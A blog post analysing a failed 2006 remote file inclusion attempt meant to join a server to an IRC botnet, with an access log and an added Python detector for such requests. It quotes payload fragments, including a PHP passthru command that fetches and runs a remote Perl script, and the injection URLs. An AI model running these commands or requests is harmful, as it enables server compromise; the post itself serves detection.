script kiddies go home.

Yeesh, another day, another set of lame attacks. This hack attempt tries to use BBCodeFile. This one, like the first one from last week, attempts to join an IRC botnet. It attempts to get files from the full-comandos.com website, and the files it attempts to download contain the following text. I’ve renamed the file extensions so accidents are less likely to happen with this code.

lol.gif.txt:@passthru('cd /tmp;wget http://jaheem.by.ru/tes.pl;perl tes.pljaheem;rm -tes.pl*');
...
r.gif.txt: $mhost = 'http://opersconexion.port5.com?';
r.gif.txt: $bt = 'http://www.full-comandos.com/jobing/r0nin';
r.gif.txt: $dc = 'http://www.full-comandos.com/jobing/dc.txt';
...
tes.pl.txt:$cmd="http://jaheem.by.ru/r.gif?";
...
#ANTICLONE 1337 :p
...
# MORGAN OWNED YOUR BOX
# www.FST-Production
# irc.gigachat.net - #Morgan

well this is enough boredom for me, for now.

attack log

px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:53 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:04 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:06 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:08 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:06 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:08 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:10 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:48 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:49 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:27 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:29 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:30 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:31 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
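
An added example, not part of the original post: a small Python filter for logs in the format above that flags any request whose query parameter value is an absolute remote URL (the BBCodeFile=http://... pattern) and groups the hits by client IP. The function names are made up for this example; the first three sample lines are copied from the log above and the fourth is a constructed benign request.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Field order as in the log above: vhost, client IP, reverse DNS, ident, user,
# [time], "request line", status, bytes, "referer", "user agent".
LINE_RE = re.compile(
    r'^\S+ (?P<ip>\S+) \S+ \S+ \S+ \[[^\]]+\] '
    r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(target):
    """Return (name, url) for query parameters whose value is an absolute URL."""
    # Split on the first '?' by hand: the doubled slashes in these request
    # paths would make urlsplit() read the first path segment as a host name.
    query = target.partition('?')[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second pass catches double-encoded values
        if REMOTE_URL_RE.match(value):
            hits.append((name, value))
    return hits

def summarize(log_text):
    """Group flagged parameters by client IP; 'hits' counts flagged parameters."""
    report = defaultdict(lambda: {'hits': 0, 'params': set(), 'hosts': set(),
                                  'statuses': set(), 'agents': set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        for name, url in remote_url_params(m['target']):
            entry = report[m['ip']]
            entry['hits'] += 1
            entry['params'].add(name)
            entry['hosts'].add(urlsplit(url).hostname)  # lower-cased by urlsplit
            entry['statuses'].add(m['status'])
            entry['agents'].add(m['agent'])
    return dict(report)

# Lines 1-3 are from the log above; line 4 (192.0.2.10) is constructed.
SAMPLE = r'''
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:53 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 192.0.2.10 192.0.2.10 - - [31/Dec/2006:07:44:00 -0700] "GET /tags/security/feed/?paged=2 HTTP/1.1" 200 1843 "-" "Mozilla/5.0" mod_deflate: In:- Out:-:-pct.
'''

if __name__ == '__main__':
    for ip, e in sorted(summarize(SAMPLE).items()):
        print(ip, e['hits'], sorted(e['params']), sorted(e['hosts']), sorted(e['statuses']))
```

Every flagged request in this log got a 404; a 200 in the statuses set for a flagged client is the case to look at first.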
